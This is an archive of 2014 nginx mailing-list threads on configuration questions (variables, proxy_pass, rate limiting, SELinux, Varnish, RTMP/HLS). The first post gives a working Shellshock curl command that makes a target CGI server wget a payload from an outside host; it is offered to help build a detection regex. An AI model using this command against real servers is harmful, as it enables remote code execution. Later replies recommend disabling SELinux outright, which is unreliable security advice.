Nginx Forum: http://forum.nginx.org/read.php?2,253553,253555#msg-253555 From nginx-forum at nginx.us Fri Sep 26 09:23:04 2014 From: nginx-forum at nginx.us (mex) Date: Fri, 26 Sep 2014 05:23:04 -0400 Subject: Shellshock protection using nginx ? In-Reply-To: References: Message-ID: <18496faa6d39eae1dda3cbd55f45e916.NginxMailingListEnglish@forum.nginx.org> curl -k -H 'User-Agent: () { somedummytext; }; /usr/bin/wget -O /tmp/nastyexe http://myserver.com/nastyexe' https://target.com/cgi-bin/hi :D if, you should try to match for (regex-pattern) "\(\) {" #since this must be written like this; an additional space between "() {" would render the exploiut non-functional further more: you are missing all headers; attacks i've seen so far worked angainst - UA - cookies - custom headers customized attacks might work via POST-BODY too, but this is yet not confirmed Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253553,253557#msg-253557 From nginx-forum at nginx.us Fri Sep 26 13:43:59 2014 From: nginx-forum at nginx.us (jamel) Date: Fri, 26 Sep 2014 09:43:59 -0400 Subject: Underscore between variables Message-ID: <274582502d1956bd363953a47440ff8c.NginxMailingListEnglish@forum.nginx.org> Hello, I'm trying to rewrite URL with parameters x, y, z to filename by such template: file_{x}_{y}_{z}.txt location /path { rewrite ^ /path/file_$arg_x_$arg_y_$arg_z.txt break; root /var/www; } But it is not working. Because nginx tries to use variables x_, y_. How can I use underscore symbol to separate variables? In bash there is curly brackets style for such cases: ${x}_${y}_${z}. May be nginx has something special for this too. -- Sergey Polovko Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253560,253560#msg-253560 From francis at daoine.org Fri Sep 26 14:11:19 2014 From: francis at daoine.org (Francis Daly) Date: Fri, 26 Sep 2014 15:11:19 +0100 Subject: Underscore between variables In-Reply-To: <274582502d1956bd363953a47440ff8c.NginxMailingListEnglish@forum.nginx.org> References: <274582502d1956bd363953a47440ff8c.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140926141119.GR3771@daoine.org> On Fri, Sep 26, 2014 at 09:43:59AM -0400, jamel wrote: Hi there, > location /path { > rewrite ^ /path/file_$arg_x_$arg_y_$arg_z.txt break; > root /var/www; > } > > But it is not working. Because nginx tries to use variables x_, y_. Does it? Or does it try to use variables arg_x_ and arg_y_? > How can I use underscore symbol to separate variables? > > In bash there is curly brackets style for such cases: ${x}_${y}_${z}. > May be nginx has something special for this too. Yes. Curly brackets. f -- Francis Daly francis at daoine.org From marcello.rocha at vagas.com.br Fri Sep 26 17:02:12 2014 From: marcello.rocha at vagas.com.br (Marcello Rocha) Date: Fri, 26 Sep 2014 14:02:12 -0300 Subject: Weird behavior when checking the existence of a cookie Message-ID: Hi list, this is my first post here, so If I commit any blunder please let me know. I have this location block: location /some_path/ { # this sets the mobile_rewrite variable based on a regex against the user_agent include /etc/nginx/mobile; # This is where the trouble lies. =/ if ($cookie_mobileBypassDaily = yes_please) { set $mobile_rewrite do_not_perform; } if ($mobile_rewrite = perform) { return 302 $scheme://my.site.com/some_path/fallback_mobile.html; break; } # upstream/ to remove the /some_path/ part of the uri proxy_pass http://upstream/; } And now to the trouble at hand: if there is no cookie the proxy_pass is executed rightly (ie. http://my.server.com/some_path/thing => http://upstream/thing). If the cookie exists the proxy_pass not only has the some_path part of the url but it also has an extraneous slash (ie. http://my.server.com/some_path/thing => http://upstream//some_path/thing). Why is this happening? What I'm doing wrong besides, maybe, everything? =) Thanks for the help *Marcello Rocha* Pesquisa & Desenvolvimento (11) 4084.1111 ou (xx) 4007.1547 [image: VAGAS] -------------- next part -------------- An HTML attachment was scrubbed... URL: From wandenberg at gmail.com Fri Sep 26 17:11:57 2014 From: wandenberg at gmail.com (Wandenberg Peixoto) Date: Fri, 26 Sep 2014 14:11:57 -0300 Subject: Weird behavior when checking the existence of a cookie In-Reply-To: References: Message-ID: By default the $uri is appended to the proxy_pass directive. Since you defined as proxy_pass http://upstream*/*; and the $uri starts with a slash you will have a double slash. Try to set proxy_pass like proxy_pass http://upstream; On Fri, Sep 26, 2014 at 2:02 PM, Marcello Rocha wrote: > Hi list, this is my first post here, so If I commit any blunder please let > me know. > > I have this location block: > > location /some_path/ { > # this sets the mobile_rewrite variable based on a regex against > the user_agent > include /etc/nginx/mobile; > > # This is where the trouble lies. =/ > if ($cookie_mobileBypassDaily = yes_please) { > set $mobile_rewrite do_not_perform; > } > > if ($mobile_rewrite = perform) { > return 302 $scheme:// > my.site.com/some_path/fallback_mobile.html; > break; > } > # upstream/ to remove the /some_path/ part of the uri > proxy_pass http://upstream/; > } > > > And now to the trouble at hand: if there is no cookie the proxy_pass is > executed rightly (ie. http://my.server.com/some_path/thing => > http://upstream/thing). If the cookie exists the proxy_pass not only has > the some_path part of the url but it also has an extraneous slash (ie. > http://my.server.com/some_path/thing => http://upstream//some_path/thing). > > Why is this happening? What I'm doing wrong besides, maybe, everything? =) > > Thanks for the help > > *Marcello Rocha* > Pesquisa & Desenvolvimento > > (11) 4084.1111 ou (xx) 4007.1547 [image: VAGAS] > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Sep 26 22:55:31 2014 From: nginx-forum at nginx.us (matt_l) Date: Fri, 26 Sep 2014 18:55:31 -0400 Subject: lua_shared_dict Message-ID: <2a573e42ae5956c23fd5df352e7e4b70.NginxMailingListEnglish@forum.nginx.org> Hello I am using http://wiki.nginx.org/HttpLuaModule#lua_shared_dict I am storing a set of of ids. local a_uuid = "... a_dict.set(a_dict, a_uuid, a_uuid) Ideally it would be more efficient for my use case to have lua_shared_set or lua_shared_bloom_filter Has anyone encounter/ implement a shared bloom filter or shared set in nginx? On a separate note, If I were to store 128 bits (16 bytes) for the key and 128 bits for the value, I would imagine that a record would take size(key)+ size(value) = 32 bytes of memory. If I want 100 million records I imagine I need 3.2GB of memory. Can i safely (provided the machine has enough memory) define lua_shared_dict a_dict 3200m? Thank you for your help Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253565,253565#msg-253565 From shahzaib.cb at gmail.com Sat Sep 27 05:41:58 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Sat, 27 Sep 2014 10:41:58 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> Message-ID: >>In general it shouldn?t since the ??start=? is handled by nginx and not varnish, but I?m not exactly sure how the mp4 module of nginx handles a proxied request. You have to test it. Sure, i'll test it. sub vcl_fetch { return (pass); } You're right about return(pass), coalescing doesn't work with pass. >>In worst case scenario imho only the first request (before landing on the proxy_store server) will ?fail? eg play from the beginning instead of the time set. Well, i am facing more worse scenario that first request always fail to stream and player(HTML5) keeps on loading. I'm already checking if there's some config issue with varnish or this is the default behaviour(Which i don't think it is). Thanks @RR Shahzaib On Fri, Sep 26, 2014 at 2:36 AM, Reinis Rozitis wrote: > It will also prevent users seeking the video because the arguments after >> "?" will remove whenever user will try to seek the video stream, isn't it ? >> > > In general it shouldn?t since the ??start=? is handled by nginx and not > varnish, but I?m not exactly sure how the mp4 module of nginx handles a > proxied request. > You have to test it. > > In worst case scenario imho only the first request (before landing on the > proxy_store server) will ?fail? eg play from the beginning instead of the > time set. > > > > Well, only proxy_store is able to fulfill my requirements that is the >> reason i'll have to stick with it. >> > > Well you can try to use varnish as the streamer, just need some > (web)player supporting byte-range requests for the seeking ( > http://flash.flowplayer.org/plugins/streaming/pseudostreaming.html ). > > > I am bit confused about the varnish. Actually, i don't need any kind of >> caching within the varnish as nginx already doing it via proxy_store. I >> just need varnish to merge the subsequent requests into 1 and forward it to >> nginx and i think varnish is doing it pretty well. Nevertheless, i am >> confused if malloc caching will have any odd effect on the stream behavior ? >> > > > You can try to pass the request without caching: > > sub vcl_fetch { > return (pass); > } > > (maybe even do it in the vcl_recv stage but again I'm not exactly sure if > in that case the request coalescing works). > > > > rr > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Sat Sep 27 18:24:00 2014 From: nginx-forum at nginx.us (paulswansea) Date: Sat, 27 Sep 2014 14:24:00 -0400 Subject: Unable to use custom variable with limit_conn_zone Message-ID: <3ad16acd346b4325dbe1eeeaa62cc5f3.NginxMailingListEnglish@forum.nginx.org> I am trying to use the limit connections / limit request. I have the server behind a proxy, the proxy has the following line : proxy_set_header X-Real-IP $remote_addr; and in my nginx.conf on my server behind the proxy i have : limit_conn_zone $http_x_real_ip zone=perip:10m; limit_conn perip 20; limit_req_zone $http_x_real_ip zone=forward:10m rate=60r/m; However, when checking my logs, I get the internal address of the proxy server listed, not the external real ip : 2014/09/27 13:45:16 [error] 57287#0: *29475 limiting requests, excess: 30.536 by zone "forward", client: 10.120.23.133 Can you see an issue with my configuration, or is there a bug with nginx in respect to using custom variables? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253572,253572#msg-253572 From vbart at nginx.com Sat Sep 27 19:56:12 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Sat, 27 Sep 2014 23:56:12 +0400 Subject: Unable to use custom variable with limit_conn_zone In-Reply-To: <3ad16acd346b4325dbe1eeeaa62cc5f3.NginxMailingListEnglish@forum.nginx.org> References: <3ad16acd346b4325dbe1eeeaa62cc5f3.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1933883.37J5iKlGLf@vbart-laptop> On Saturday 27 September 2014 14:24:00 paulswansea wrote: > I am trying to use the limit connections / limit request. I have the server > behind a proxy, the proxy has the following line : > > proxy_set_header X-Real-IP $remote_addr; > > and in my nginx.conf on my server behind the proxy i have : > > limit_conn_zone $http_x_real_ip zone=perip:10m; > limit_conn perip 20; > limit_req_zone $http_x_real_ip zone=forward:10m rate=60r/m; > > However, when checking my logs, I get the internal address of the proxy > server listed, not the external real ip : > > 2014/09/27 13:45:16 [error] 57287#0: *29475 limiting requests, excess: > 30.536 by zone "forward", client: 10.120.23.133 > > Can you see an issue with my configuration, or is there a bug with nginx in > respect to using custom variables? > [..] IPs in log messages don't related to variable from limit zone. So there's no problem. But if you want to see IP from the header in logs, then you should configure the realip module: http://http://nginx.org/en/docs/http/ngx_http_realip_module.html wbr, Valentin V. Bartenev From jeremypiven at fastmail.fm Sun Sep 28 20:51:22 2014 From: jeremypiven at fastmail.fm (Jeremy Piven) Date: Sun, 28 Sep 2014 13:51:22 -0700 Subject: modify response code based on upstream response Message-ID: <1411937482.1003029.172703649.7459AFF8@webmail.messagingengine.com> I have a set of webservers with nginx acting as a reverse proxy for tomcat behind an AWS ELB. Request -> AWS ELB -> Nginx -> Tomcat To understand if my application is healthy or not I have to send a request for /status/health. If "health:0" comes back it means the server is not ready to serve traffic. If "health:1" comes back it means the server is ready to serve traffic. Unfortunately, in both scenarios the http response code is always 200. Since AWS ELB has a dumb healthcheck method I can't place a server in or out of rotation based on the actual response output. AWS only considers http response code. Is it possible to have Nginx modify the http response code based on the upstream output? I want to basically say if the tomcat response is "health:0" return an http response code 503. -- Jeremy Piven jeremypiven at fastmail.fm From nginx-forum at nginx.us Sun Sep 28 22:15:53 2014 From: nginx-forum at nginx.us (mert1972) Date: Sun, 28 Sep 2014 18:15:53 -0400 Subject: nginx cannot listen to port 8090 Message-ID: <6a00a3bbae95b96f5d78d4977c27f71c.NginxMailingListEnglish@forum.nginx.org> Hello all, I am trying to enable nginx to listen to port 8090 via default.conf file under /etc/nginx/conf.d directory but it fails with following error : -- Unit nginx.service has begun starting up. Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com nginx[7284]: nginx: the configuration file /etc/nginx/nginx.conf syntax is ok Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com nginx[7284]: nginx: [emerg] bind() to 0.0.0.0:8090 failed (13: Permission denied) Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com nginx[7284]: nginx: configuration file /etc/nginx/nginx.conf test failed Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com systemd[1]: nginx.service: control process exited, code=exited status=1 Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com systemd[1]: Failed to start nginx - high performance web server. -- Subject: Unit nginx.service has failed -- Defined-By: systemd -- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel -- -- Unit nginx.service has failed. -- -- The result is failed. Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com systemd[1]: Unit nginx.service entered failed state. [root at spidrproxy conf.d]# default.conf file is as below : server { listen 8090; server_name 47.168.136.70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # #location ~ \.php$ { # proxy_pass http://127.0.0.1; #} # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253578,253578#msg-253578 From vsjcfm at gmail.com Mon Sep 29 04:45:03 2014 From: vsjcfm at gmail.com (Anton Sayetsky) Date: Mon, 29 Sep 2014 07:45:03 +0300 Subject: nginx cannot listen to port 8090 In-Reply-To: <6a00a3bbae95b96f5d78d4977c27f71c.NginxMailingListEnglish@forum.nginx.org> References: <6a00a3bbae95b96f5d78d4977c27f71c.NginxMailingListEnglish@forum.nginx.org> Message-ID: Looks like SELinux/AppArmor problem. 2014-09-29 1:15 GMT+03:00 mert1972 : > Hello all, > > I am trying to enable nginx to listen to port 8090 via default.conf file > under /etc/nginx/conf.d directory but it fails with following error : > > -- Unit nginx.service has begun starting up. > Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com nginx[7284]: nginx: the > configuration file /etc/nginx/nginx.conf syntax is ok > Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com nginx[7284]: nginx: [emerg] > bind() to 0.0.0.0:8090 failed (13: Permission denied) > Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com nginx[7284]: nginx: > configuration file /etc/nginx/nginx.conf test failed > Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com systemd[1]: nginx.service: > control process exited, code=exited status=1 > Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com systemd[1]: Failed to start > nginx - high performance web server. > -- Subject: Unit nginx.service has failed > -- Defined-By: systemd > -- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel > -- > -- Unit nginx.service has failed. > -- > -- The result is failed. > Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com systemd[1]: Unit > nginx.service entered failed state. > > [root at spidrproxy conf.d]# > > > default.conf file is as below : > > server { > listen 8090; > server_name 47.168.136.70; > > #charset koi8-r; > #access_log /var/log/nginx/log/host.access.log main; > > location / { > root /usr/share/nginx/html; > index index.html index.htm; > } > > #error_page 404 /404.html; > > # redirect server error pages to the static page /50x.html > # > error_page 500 502 503 504 /50x.html; > location = /50x.html { > root /usr/share/nginx/html; > } > > # proxy the PHP scripts to Apache listening on 127.0.0.1:80 > # > #location ~ \.php$ { > # proxy_pass http://127.0.0.1; > #} > > # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 > # > #location ~ \.php$ { > # root html; > # fastcgi_pass 127.0.0.1:9000; > # fastcgi_index index.php; > # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; > # include fastcgi_params; > #} > > # deny access to .htaccess files, if Apache's document root > # concurs with nginx's one > # > #location ~ /\.ht { > # deny all; > #} > } > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253578,253578#msg-253578 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From mdounin at mdounin.ru Mon Sep 29 11:06:43 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 29 Sep 2014 15:06:43 +0400 Subject: Nginx run into Stat D In-Reply-To: References: Message-ID: <20140929110643.GM10052@mdounin.ru> Hello! On Fri, Sep 26, 2014 at 03:45:40PM +0800, Zhang Qiang wrote: > Hi community, > > We are using Nginx as static http server to cache/send static smal file. > The average file size is about 10k ~ 200k -, and nginx server can process > ~10000 request per second. It runs well but some times most of nginx worker > go into Stat D. and there's no way to kill them but restart system. > > Here's the call stack for kernel/user space: > > With AIO enabled > -----Kernel Space Call Stack----- > 0xffffffff8111f700 : sync_page+0x0/0x50 [kernel] > 0xffffffff8111f75e : sync_page_killable+0xe/0x40 [kernel] > 0xffffffff81529e7a : __wait_on_bit_lock+0x5a/0xc0 [kernel] > 0xffffffff8111f667 : __lock_page_killable+0x67/0x70 [kernel] > 0xffffffff81121394 : generic_file_aio_read+0x4b4/0x700 [kernel] > 0xffffffff811d58d4 : aio_rw_vect_retry+0x84/0x200 [kernel] > 0xffffffff811d7294 : aio_run_iocb+0x64/0x170 [kernel] > 0xffffffff811d86c1 : do_io_submit+0x291/0x920 [kernel] > 0xffffffff811d8d60 : sys_io_submit+0x10/0x20 [kernel] > 0xffffffff8100b288 : tracesys+0xd9/0xde [kernel] > -----User Space Call Stack----- > 0x3c362e50c9 : syscall+0x19/0x40 [/lib64/libc-2.12.so] > 0x4d2232 : ngx_linux_sendfile_chain+0xc2a/0xc2c > [/opt/soft/nginx/sbin/nginx] > 0x4d24ea : ngx_file_aio_read+0x2b6/0x528 [/opt/soft/nginx/sbin/nginx] > 0x515247 : ngx_http_file_cache_open+0xbef/0x1437 > [/opt/soft/nginx/sbin/nginx] > 0x514df6 : ngx_http_file_cache_open+0x79e/0x1437 > [/opt/soft/nginx/sbin/nginx] > 0x514abb : ngx_http_file_cache_open+0x463/0x1437 > [/opt/soft/nginx/sbin/nginx] Just a side note: it looks like there are very wrong symbols shown in the stack, likely due to optimizations used. [...] > Is anyone see these issue (pending on Stat D) before? how can I resolve it? > it seems that not the kernel issue. What makes you think so? It looks like the kernel issue from here - "unkillable" proceses just can't happen due to userland code unless there is a problem in the kernel. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Mon Sep 29 11:31:20 2014 From: nginx-forum at nginx.us (mert1972) Date: Mon, 29 Sep 2014 07:31:20 -0400 Subject: nginx cannot listen to port 8090 In-Reply-To: References: Message-ID: <42650c0a8a9735fa8979fb27b8c5b934.NginxMailingListEnglish@forum.nginx.org> Thanks Anton for your response, Would you please provide some hints about how I can overcome this issue. This is a newly built Centos 7 system, I am a bit new to Centos. Best Regards, Volkan. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253578,253588#msg-253588 From dewanggaba at xtremenitro.org Mon Sep 29 11:38:01 2014 From: dewanggaba at xtremenitro.org (Dewangga Bachrul Alam) Date: Mon, 29 Sep 2014 18:38:01 +0700 Subject: nginx cannot listen to port 8090 In-Reply-To: <42650c0a8a9735fa8979fb27b8c5b934.NginxMailingListEnglish@forum.nginx.org> References: <42650c0a8a9735fa8979fb27b8c5b934.NginxMailingListEnglish@forum.nginx.org> Message-ID: <54294499.9080407@xtremenitro.org> Are you familiar with SELinux? If not, just disable it :) Try run 'getenforce' (without quotes) on your console, it must be enforcing. On 09/29/2014 06:31 PM, mert1972 wrote: > Thanks Anton for your response, > Would you please provide some hints about how I can overcome this issue. > This is a newly built Centos 7 system, I am a bit new to Centos. > > Best Regards, > Volkan. > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253578,253588#msg-253588 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > From shahzaib.cb at gmail.com Mon Sep 29 13:05:03 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Mon, 29 Sep 2014 18:05:03 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> Message-ID: @RR, i would like to inform you that the issue regarding failed stream for 1st request is solved. Varnish was removing content-length header for 1st request . Enabling Esi processing has resolved this issue. set beresp.do_esi = true; http://stackoverflow.com/questions/23643233/how-do-i-disable-transfer-encoding-chunked-encoding-in-varnish thanks !! On Sat, Sep 27, 2014 at 10:41 AM, shahzaib shahzaib wrote: > >>In general it shouldn?t since the ??start=? is handled by nginx and not > varnish, but I?m not exactly sure how the mp4 module of nginx handles a > proxied request. > You have to test it. > > Sure, i'll test it. > > sub vcl_fetch { > return (pass); > } > > You're right about return(pass), coalescing doesn't work with pass. > > >>In worst case scenario imho only the first request (before landing on > the proxy_store server) will ?fail? eg play from the beginning instead of > the time set. > Well, i am facing more worse scenario that first request always fail to > stream and player(HTML5) keeps on loading. > > I'm already checking if there's some config issue with varnish or this is > the default behaviour(Which i don't think it is). > > Thanks @RR > > Shahzaib > > > On Fri, Sep 26, 2014 at 2:36 AM, Reinis Rozitis wrote: > >> It will also prevent users seeking the video because the arguments after >>> "?" will remove whenever user will try to seek the video stream, isn't it ? >>> >> >> In general it shouldn?t since the ??start=? is handled by nginx and not >> varnish, but I?m not exactly sure how the mp4 module of nginx handles a >> proxied request. >> You have to test it. >> >> In worst case scenario imho only the first request (before landing on the >> proxy_store server) will ?fail? eg play from the beginning instead of the >> time set. >> >> >> >> Well, only proxy_store is able to fulfill my requirements that is the >>> reason i'll have to stick with it. >>> >> >> Well you can try to use varnish as the streamer, just need some >> (web)player supporting byte-range requests for the seeking ( >> http://flash.flowplayer.org/plugins/streaming/pseudostreaming.html ). >> >> >> I am bit confused about the varnish. Actually, i don't need any kind of >>> caching within the varnish as nginx already doing it via proxy_store. I >>> just need varnish to merge the subsequent requests into 1 and forward it to >>> nginx and i think varnish is doing it pretty well. Nevertheless, i am >>> confused if malloc caching will have any odd effect on the stream behavior ? >>> >> >> >> You can try to pass the request without caching: >> >> sub vcl_fetch { >> return (pass); >> } >> >> (maybe even do it in the vcl_recv stage but again I'm not exactly sure if >> in that case the request coalescing works). >> >> >> >> rr >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From shahzaib.cb at gmail.com Mon Sep 29 13:06:11 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Mon, 29 Sep 2014 18:06:11 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> Message-ID: Also, removing arguments after "?" also disabled the pseudo streaming. So i think i can't apply this method !! On Mon, Sep 29, 2014 at 6:05 PM, shahzaib shahzaib wrote: > @RR, i would like to inform you that the issue regarding failed stream for > 1st request is solved. Varnish was removing content-length header for 1st > request . Enabling Esi processing has resolved this issue. > > set beresp.do_esi = true; > > > http://stackoverflow.com/questions/23643233/how-do-i-disable-transfer-encoding-chunked-encoding-in-varnish > > thanks !! > > On Sat, Sep 27, 2014 at 10:41 AM, shahzaib shahzaib > wrote: > >> >>In general it shouldn?t since the ??start=? is handled by nginx and not >> varnish, but I?m not exactly sure how the mp4 module of nginx handles a >> proxied request. >> You have to test it. >> >> Sure, i'll test it. >> >> sub vcl_fetch { >> return (pass); >> } >> >> You're right about return(pass), coalescing doesn't work with pass. >> >> >>In worst case scenario imho only the first request (before landing on >> the proxy_store server) will ?fail? eg play from the beginning instead of >> the time set. >> Well, i am facing more worse scenario that first request always fail to >> stream and player(HTML5) keeps on loading. >> >> I'm already checking if there's some config issue with varnish or this is >> the default behaviour(Which i don't think it is). >> >> Thanks @RR >> >> Shahzaib >> >> >> On Fri, Sep 26, 2014 at 2:36 AM, Reinis Rozitis wrote: >> >>> It will also prevent users seeking the video because the arguments after >>>> "?" will remove whenever user will try to seek the video stream, isn't it ? >>>> >>> >>> In general it shouldn?t since the ??start=? is handled by nginx and not >>> varnish, but I?m not exactly sure how the mp4 module of nginx handles a >>> proxied request. >>> You have to test it. >>> >>> In worst case scenario imho only the first request (before landing on >>> the proxy_store server) will ?fail? eg play from the beginning instead of >>> the time set. >>> >>> >>> >>> Well, only proxy_store is able to fulfill my requirements that is the >>>> reason i'll have to stick with it. >>>> >>> >>> Well you can try to use varnish as the streamer, just need some >>> (web)player supporting byte-range requests for the seeking ( >>> http://flash.flowplayer.org/plugins/streaming/pseudostreaming.html ). >>> >>> >>> I am bit confused about the varnish. Actually, i don't need any kind of >>>> caching within the varnish as nginx already doing it via proxy_store. I >>>> just need varnish to merge the subsequent requests into 1 and forward it to >>>> nginx and i think varnish is doing it pretty well. Nevertheless, i am >>>> confused if malloc caching will have any odd effect on the stream behavior ? >>>> >>> >>> >>> You can try to pass the request without caching: >>> >>> sub vcl_fetch { >>> return (pass); >>> } >>> >>> (maybe even do it in the vcl_recv stage but again I'm not exactly sure >>> if in that case the request coalescing works). >>> >>> >>> >>> rr >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >> >> > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Mon Sep 29 13:10:34 2014 From: nginx-forum at nginx.us (mert1972) Date: Mon, 29 Sep 2014 09:10:34 -0400 Subject: nginx cannot listen to port 8090 In-Reply-To: <54294499.9080407@xtremenitro.org> References: <54294499.9080407@xtremenitro.org> Message-ID: <85b94868d717c49635d029ae9e50f2a4.NginxMailingListEnglish@forum.nginx.org> Thanks a lot Anton and dewanggaba, it worked after disabling Selinux on the system. Your kind support is highly appreciated. Best Regards, Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253578,253594#msg-253594 From vsjcfm at gmail.com Mon Sep 29 13:12:59 2014 From: vsjcfm at gmail.com (Anton Sayetsky) Date: Mon, 29 Sep 2014 16:12:59 +0300 Subject: nginx cannot listen to port 8090 In-Reply-To: <42650c0a8a9735fa8979fb27b8c5b934.NginxMailingListEnglish@forum.nginx.org> References: <42650c0a8a9735fa8979fb27b8c5b934.NginxMailingListEnglish@forum.nginx.org> Message-ID: Take a look at /etc/sysconfig/selinux and this link http://wiki.centos.org/HowTos/SELinux (you can create custom policy which will allow nginx to bind to nonstandard port). 2014-09-29 14:31 GMT+03:00 mert1972 : > Thanks Anton for your response, > Would you please provide some hints about how I can overcome this issue. > This is a newly built Centos 7 system, I am a bit new to Centos. > > Best Regards, > Volkan. > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253578,253588#msg-253588 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at nginx.us Tue Sep 30 05:35:30 2014 From: nginx-forum at nginx.us (martinproinity) Date: Tue, 30 Sep 2014 01:35:30 -0400 Subject: Max File Size Allowed In Cache In-Reply-To: References: Message-ID: <02105dd93b8a02aa95e62e3ad9482055.NginxMailingListEnglish@forum.nginx.org> would be interesting to know the answer to this questions as I was wondering as well if that is possible. Thanks for the response! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253260,253608#msg-253608 From nginx-forum at nginx.us Tue Sep 30 10:54:27 2014 From: nginx-forum at nginx.us (simonb) Date: Tue, 30 Sep 2014 06:54:27 -0400 Subject: Pull from HLS to trigger non-static RTMP pull Message-ID: <6b91a08e386b562183cbb12d88ea47d2.NginxMailingListEnglish@forum.nginx.org> I have set up an RTMP relay of all streams on a remote location. This works fine as long as there is an RTMP request to trigger the pull from the remote server. However HLS requests only work for as long as the RTMP request is present. Is there any way to get HLS (or DASH) requests to trigger the RTMP pull? I was wondering if I am approaching this the right way. Maybe it would be better to set up the server as an http proxy to the hls and dash streams from the origin server. Any thoughts? I am running nginx_1.4.6-1ubuntu3.1 patched with the rtmp module pulled from git. My RTMP server application config is... application live { live on; hls on; hls_path /tmp/live; pull rtmp://89057213.r.cdn77.net/89057213; } My server config is... location /live { # Serve HLS fragments types { application/vnd.apple.mpegurl m3u8; video/mp2t ts; } root /tmp; add_header Cache-Control no-cache; } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253613,253613#msg-253613 From nginx-forum at nginx.us Tue Sep 30 11:23:47 2014 From: nginx-forum at nginx.us (simonb) Date: Tue, 30 Sep 2014 07:23:47 -0400 Subject: Pull from HLS to trigger non-static RTMP pull In-Reply-To: <6b91a08e386b562183cbb12d88ea47d2.NginxMailingListEnglish@forum.nginx.org> References: <6b91a08e386b562183cbb12d88ea47d2.NginxMailingListEnglish@forum.nginx.org> Message-ID: <7a6b6e22e7d0816da7550b9601b0de9e.NginxMailingListEnglish@forum.nginx.org> OK. Answering my own post here. I set up an standard http proxy to the origin server and it seems to be relaying HLS as expected. So the rtmp application is now... application live { live on; pull rtmp://89057213.r.cdn77.net/89057213; } And the server config is now... location /live { proxy_pass http://89057213.r.cdn77.net/89057213/; } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253613,253616#msg-253616 From mdounin at mdounin.ru Tue Sep 30 12:05:24 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 30 Sep 2014 